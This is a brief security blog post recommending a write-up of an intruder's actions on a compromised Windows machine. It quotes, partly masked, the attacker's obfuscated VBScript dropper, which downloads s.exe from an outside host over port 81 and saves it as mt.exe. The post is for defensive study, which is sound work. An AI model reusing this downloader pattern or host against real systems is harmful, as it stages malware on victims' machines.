.:Computer Defense:.

A rather interesting link was sent out a couple days ago to the SecurityBasics mailing list.. It documents the actions taking by a "hacker" after they have gained access to an insecure Windows box.... While details of the exploit used and the system setup are not revealed it is still interesting to read through and see the actions that are performed... snort data and packet captures are included, however they've been heavily sanitized.

I would have to say that step 14 was by far the best as it includes some scripting that was written to a file.. When cleaned up the code looks a little more like this

execute(chr(8x)^&^chr(101)^&^chr(116)^&^chr(x2)^&^chr(120)^&^chr(80)^&^chr(111)^&^chr(115)^&^chr(116)^&^chr(x2)&^chr(61)^
&^chr(x2)^&^chr(67)^&^chr(11x)^&^chr(101)^&^chr(97)^&^chr(116)^&^chr(101)^&^chr(79)^&^chr(98)^&^chr(10)^&^chr(101)^&^
chr(99)^&^chr(116)^&^chr(x0)^&^chr(xx)^&^chr(77)^&^chr(105)^&^chr(99)^&^chr(11x)^&^chr(111)^&^chr115)^&^chr(111)^&
^chr(102)^&^chr(116)^&^chr(x6)^&^chr(88)^&^chr(77)^&^chr(76)^&^chr(72)^&^chr(8x)^&^chr(8x)^&^ch(80)^&^chr(xx)^&^chr(x1)
^&^chr(58)^&^chr(10))
xPost.Open ^"GET^",^"http://ZXMM.KMIP.NET:81/s.exe^",0
xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^")
sGet.Mode =x
sGet.Type = 1:sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile ^"mt.exe^",2

Anyways.... it won't take overly long to read and it was definately worth the read.

Peace,
HT